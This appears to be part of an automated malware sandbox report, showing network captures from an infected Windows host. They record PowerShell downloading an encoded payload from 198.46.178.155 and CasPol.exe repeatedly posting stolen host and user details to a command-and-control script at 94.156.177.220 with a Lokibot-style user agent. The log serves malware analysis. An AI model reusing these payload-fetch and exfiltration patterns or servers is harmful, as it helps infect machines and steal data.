                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                    Oct 29, 2024 10:13:25.732142925 CET1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                    Oct 29, 2024 10:13:25.732156992 CET1236INData Raw: 43 4a 6b 51 2b 76 39 32 6f 63 36 33 73 34 2f 32 62 54 30 45 2b 41 77 46 47 47 6b 51 43 4a 70 51 43 70 2b 31 42 67 50 41 53 4b 41 4b 42 41 64 2b 43 4a 6b 30 58 48 41 2b 41 49 6b 51 43 4a 6b 47 35 42 4d 51 43 4a 6b 51 43 67 53 41 51 6e 76 64 2f 39
                                                                                                    Data Ascii: CJkQ+v92oc63s4/2bT0E+AwFGGkQCJpQCp+1BgPASKAKBAd+CJk0XHA+AIkQCJkG5BMQCJkQCgSAQnvd/9//vLkQCJkQCJkQCJkfRCJ09PkQCJkQCJYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                    Oct 29, 2024 10:13:25.737709045 CET1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAsxGZuIzMUVVQFx0TAwGbk5iMzUGbvBAAlNmbhR3culUZ0FWZyN0bDBAEAAQZ6lGbhlGdp5WauV1bDBAbAAQZ6lGbhlGdp5WSvNEA+AAAsxGZuIzMMVkTSV0SAAAc


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    5192.168.2.2249178198.46.178.155802692C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 29, 2024 10:13:25.696158886 CET80OUTGET /422/SMPRGSSR.txt HTTP/1.1
                                                                                                    Host: 198.46.178.155
                                                                                                    Connection: Keep-Alive


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    6192.168.2.224917994.156.177.220804080C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 29, 2024 10:13:29.850876093 CET246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                    Host: 94.156.177.220
                                                                                                    Accept: */*
                                                                                                    Content-Type: application/octet-stream
                                                                                                    Content-Encoding: binary
                                                                                                    Content-Key: 508F6F5C
                                                                                                    Content-Length: 176
                                                                                                    Connection: close
                                                                                                    Oct 29, 2024 10:13:29.856264114 CET176OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 36 00 30 00 39 00 32 00 39 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                    Data Ascii: 'ckav.ruAlbus609290ALBUS-PCk0DE4229FCF97F5879F50F8FD3aqKRa
                                                                                                    Oct 29, 2024 10:13:30.820775032 CET228INHTTP/1.1 404 Not Found
                                                                                                    Server: nginx/1.26.1
                                                                                                    Date: Tue, 29 Oct 2024 09:13:30 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Content-Length: 15
                                                                                                    Connection: close
                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                    Status: 404 Not Found
                                                                                                    Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                    Data Ascii: File not found.


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    7192.168.2.224918094.156.177.220804080C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 29, 2024 10:13:30.950016975 CET246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                    Host: 94.156.177.220
                                                                                                    Accept: */*
                                                                                                    Content-Type: application/octet-stream
                                                                                                    Content-Encoding: binary
                                                                                                    Content-Key: 508F6F5C
                                                                                                    Content-Length: 176
                                                                                                    Connection: close
                                                                                                    Oct 29, 2024 10:13:30.955411911 CET176OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 36 00 30 00 39 00 32 00 39 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                    Data Ascii: 'ckav.ruAlbus609290ALBUS-PC+0DE4229FCF97F5879F50F8FD3lzSSv
                                                                                                    Oct 29, 2024 10:13:31.931524992 CET228INHTTP/1.1 404 Not Found
                                                                                                    Server: nginx/1.26.1
                                                                                                    Date: Tue, 29 Oct 2024 09:13:31 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Content-Length: 15
                                                                                                    Connection: close
                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                    Status: 404 Not Found
                                                                                                    Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                    Data Ascii: File not found.


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    8192.168.2.224918194.156.177.220804080C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 29, 2024 10:13:31.993150949 CET246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                    Host: 94.156.177.220
                                                                                                    Accept: */*
                                                                                                    Content-Type: application/octet-stream
                                                                                                    Content-Encoding: binary
                                                                                                    Content-Key: 508F6F5C
                                                                                                    Content-Length: 149
                                                                                                    Connection: close
                                                                                                    Oct 29, 2024 10:13:31.998506069 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 36 00 30 00 39 00 32 00 39 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                    Data Ascii: (ckav.ruAlbus609290ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                    Oct 29, 2024 10:13:32.963135004 CET236INHTTP/1.1 404 Not Found
                                                                                                    Server: nginx/1.26.1
                                                                                                    Date: Tue, 29 Oct 2024 09:13:32 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Content-Length: 23
                                                                                                    Connection: close
                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                    Status: 404 Not Found
                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                    Data Ascii: File not found.


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    9192.168.2.224918294.156.177.220804080C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 29, 2024 10:13:33.102922916 CET246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                    Host: 94.156.177.220
                                                                                                    Accept: */*
                                                                                                    Content-Type: application/octet-stream
                                                                                                    Content-Encoding: binary
                                                                                                    Content-Key: 508F6F5C
                                                                                                    Content-Length: 149
                                                                                                    Connection: close
                                                                                                    Oct 29, 2024 10:13:33.108547926 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 36 00 30 00 39 00 32 00 39 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                    Data Ascii: (ckav.ruAlbus609290ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                    Oct 29, 2024 10:13:34.088398933 CET236INHTTP/1.1 404 Not Found
                                                                                                    Server: nginx/1.26.1
                                                                                                    Date: Tue, 29 Oct 2024 09:13:33 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Content-Length: 23
                                                                                                    Connection: close
                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                    Status: 404 Not Found
                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                    Data Ascii: File not found.


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    10192.168.2.224918394.156.177.220804080C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 29, 2024 10:13:34.226057053 CET246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                    Host: 94.156.177.220
                                                                                                    Accept: */*
                                                                                                    Content-Type: application/octet-stream
                                                                                                    Content-Encoding: binary
                                                                                                    Content-Key: 508F6F5C
                                                                                                    Content-Length: 149
                                                                                                    Connection: close
                                                                                                    Oct 29, 2024 10:13:34.231391907 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 36 00 30 00 39 00 32 00 39 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                    Data Ascii: (ckav.ruAlbus609290ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                    Oct 29, 2024 10:13:35.198827028 CET236INHTTP/1.1 404 Not Found
                                                                                                    Server: nginx/1.26.1
                                                                                                    Date: Tue, 29 Oct 2024 09:13:35 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Content-Length: 23
                                                                                                    Connection: close
                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                    Status: 404 Not Found
                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                    Data Ascii: File not found.


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    11192.168.2.224918494.156.177.220804080C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 29, 2024 10:13:35.335506916 CET246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                    Host: 94.156.177.220
                                                                                                    Accept: */*
                                                                                                    Content-Type: application/octet-stream
                                                                                                    Content-Encoding: binary
                                                                                                    Content-Key: 508F6F5C
                                                                                                    Content-Length: 149
                                                                                                    Connection: close
                                                                                                    Oct 29, 2024 10:13:35.341028929 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 36 00 30 00 39 00 32 00 39 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                    Data Ascii: (ckav.ruAlbus609290ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                    Oct 29, 2024 10:13:36.316760063 CET236INHTTP/1.1 404 Not Found
                                                                                                    Server: nginx/1.26.1
                                                                                                    Date: Tue, 29 Oct 2024 09:13:36 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Content-Length: 23
                                                                                                    Connection: close
                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                    Status: 404 Not Found
                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                    Data Ascii: File not found.


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    12192.168.2.224918594.156.177.220804080C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 29, 2024 10:13:36.458357096 CET246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                    Host: 94.156.177.220
                                                                                                    Accept: */*
                                                                                                    Content-Type: application/octet-stream
                                                                                                    Content-Encoding: binary
                                                                                                    Content-Key: 508F6F5C
                                                                                                    Content-Length: 149
                                                                                                    Connection: close
                                                                                                    Oct 29, 2024 10:13:36.463967085 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 36 00 30 00 39 00 32 00 39 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                    Data Ascii: (ckav.ruAlbus609290ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                    Oct 29, 2024 10:13:37.422147989 CET236INHTTP/1.1 404 Not Found
                                                                                                    Server: nginx/1.26.1
                                                                                                    Date: Tue, 29 Oct 2024 09:13:37 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Content-Length: 23
                                                                                                    Connection: close
                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                    Status: 404 Not Found
                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                    Data Ascii: File not found.


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    13192.168.2.224918694.156.177.220804080C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 29, 2024 10:13:37.574032068 CET246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                    Host: 94.156.177.220
                                                                                                    Accept: */*
                                                                                                    Content-Type: application/octet-stream
                                                                                                    Content-Encoding: binary
                                                                                                    Content-Key: 508F6F5C
                                                                                                    Content-Length: 149
                                                                                                    Connection: close
                                                                                                    Oct 29, 2024 10:13:37.579761028 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 36 00 30 00 39 00 32 00 39 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                    Data Ascii: (ckav.ruAlbus609290ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                    Oct 29, 2024 10:13:38.548294067 CET236INHTTP/1.1 404 Not Found
                                                                                                    Server: nginx/1.26.1
                                                                                                    Date: Tue, 29 Oct 2024 09:13:38 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Content-Length: 23
                                                                                                    Connection: close
                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                    Status: 404 Not Found
                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                    Data Ascii: File not found.


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    14192.168.2.224918794.156.177.220804080C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 29, 2024 10:13:39.044512987 CET246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                    Host: 94.156.177.220
                                                                                                    Accept: */*
                                                                                                    Content-Type: application/octet-stream
                                                                                                    Content-Encoding: binary
                                                                                                    Content-Key: 508F6F5C
                                                                                                    Content-Length: 149
                                                                                                    Connection: close
                                                                                                    Oct 29, 2024 10:13:39.050087929 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 36 00 30 00 39 00 32 00 39 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                    Data Ascii: (ckav.ruAlbus609290ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                    Oct 29, 2024 10:13:40.015830994 CET236INHTTP/1.1 404 Not Found
                                                                                                    Server: nginx/1.26.1
                                                                                                    Date: Tue, 29 Oct 2024 09:13:39 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Content-Length: 23
                                                                                                    Connection: close
                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                    Status: 404 Not Found
                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                    Data Ascii: File not found.


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    15192.168.2.224918894.156.177.220804080C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 29, 2024 10:13:40.165275097 CET246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                    Host: 94.156.177.220
                                                                                                    Accept: */*
                                                                                                    Content-Type: application/octet-stream
                                                                                                    Content-Encoding: binary
                                                                                                    Content-Key: 508F6F5C
                                                                                                    Content-Length: 149
                                                                                                    Connection: close
                                                                                                    Oct 29, 2024 10:13:40.170722008 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 36 00 30 00 39 00 32 00 39 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                    Data Ascii: (ckav.ruAlbus609290ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                    Oct 29, 2024 10:13:41.128218889 CET236INHTTP/1.1 404 Not Found
                                                                                                    Server: nginx/1.26.1
                                                                                                    Date: Tue, 29 Oct 2024 09:13:40 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Content-Length: 23
                                                                                                    Connection: close
                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                    Status: 404 Not Found
                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                    Data Ascii: File not found.


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    16192.168.2.224918994.156.177.220804080C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 29, 2024 10:13:41.775866985 CET246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                    Host: 94.156.177.220
                                                                                                    Accept: */*
                                                                                                    Content-Type: application/octet-stream
                                                                                                    Content-Encoding: binary
                                                                                                    Content-Key: 508F6F5C
                                                                                                    Content-Length: 149
                                                                                                    Connection: close
                                                                                                    Oct 29, 2024 10:13:41.781265974 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 36 00 30 00 39 00 32 00 39 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                    Data Ascii: (ckav.ruAlbus609290ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                    Oct 29, 2024 10:13:42.743273020 CET236INHTTP/1.1 404 Not Found
                                                                                                    Server: nginx/1.26.1
                                                                                                    Date: Tue, 29 Oct 2024 09:13:42 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Content-Length: 23
                                                                                                    Connection: close
                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                    Status: 404 Not Found
                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                    Data Ascii: File not found.


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    17192.168.2.224919094.156.177.220804080C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 29, 2024 10:13:42.890322924 CET246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                    Host: 94.156.177.220
                                                                                                    Accept: */*
                                                                                                    Content-Type: application/octet-stream
                                                                                                    Content-Encoding: binary
                                                                                                    Content-Key: 508F6F5C
                                                                                                    Content-Length: 149
                                                                                                    Connection: close
                                                                                                    Oct 29, 2024 10:13:42.896729946 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 36 00 30 00 39 00 32 00 39 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                    Data Ascii: (ckav.ruAlbus609290ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                    Oct 29, 2024 10:13:43.861439943 CET236INHTTP/1.1 404 Not Found
                                                                                                    Server: nginx/1.26.1
                                                                                                    Date: Tue, 29 Oct 2024 09:13:43 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Content-Length: 23
                                                                                                    Connection: close
                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                    Status: 404 Not Found
                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                    Data Ascii: File not found.


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    18192.168.2.224919194.156.177.220804080C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 29, 2024 10:13:44.978693008 CET246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                    Host: 94.156.177.220
                                                                                                    Accept: */*
                                                                                                    Content-Type: application/octet-stream
                                                                                                    Content-Encoding: binary
                                                                                                    Content-Key: 508F6F5C
                                                                                                    Content-Length: 149
                                                                                                    Connection: close
                                                                                                    Oct 29, 2024 10:13:44.993803978 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 36 00 30 00 39 00 32 00 39 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                    Data Ascii: (ckav.ruAlbus609290ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                    Oct 29, 2024 10:13:45.944247007 CET236INHTTP/1.1 404 Not Found
                                                                                                    Server: nginx/1.26.1
                                                                                                    Date: Tue, 29 Oct 2024 09:13:45 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Content-Length: 23
                                                                                                    Connection: close
                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                    Status: 404 Not Found
                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                    Data Ascii: File not found.


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    19192.168.2.224919294.156.177.220804080C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 29, 2024 10:13:46.275424004 CET246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                    Host: 94.156.177.220
                                                                                                    Accept: */*
                                                                                                    Content-Type: application/octet-stream
                                                                                                    Content-Encoding: binary
                                                                                                    Content-Key: 508F6F5C
                                                                                                    Content-Length: 149
                                                                                                    Connection: close
                                                                                                    Oct 29, 2024 10:13:46.280841112 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 36 00 30 00 39 00 32 00 39 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                    Data Ascii: (ckav.ruAlbus609290ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                    Oct 29, 2024 10:13:47.248029947 CET236INHTTP/1.1 404 Not Found
                                                                                                    Server: nginx/1.26.1
                                                                                                    Date: Tue, 29 Oct 2024 09:13:47 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Content-Length: 23
                                                                                                    Connection: close
                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                    Status: 404 Not Found
                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                    Data Ascii: File not found.


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    20192.168.2.224919394.156.177.220804080C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 29, 2024 10:13:47.415524006 CET246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                    Host: 94.156.177.220
                                                                                                    Accept: */*
                                                                                                    Content-Type: application/octet-stream
                                                                                                    Content-Encoding: binary
                                                                                                    Content-Key: 508F6F5C
                                                                                                    Content-Length: 149
                                                                                                    Connection: close
                                                                                                    Oct 29, 2024 10:13:47.420972109 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 36 00 30 00 39 00 32 00 39 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                    Data Ascii: (ckav.ruAlbus609290ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                    Oct 29, 2024 10:13:48.453265905 CET236INHTTP/1.1 404 Not Found
                                                                                                    Server: nginx/1.26.1
                                                                                                    Date: Tue, 29 Oct 2024 09:13:48 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Content-Length: 23
                                                                                                    Connection: close
                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                    Status: 404 Not Found
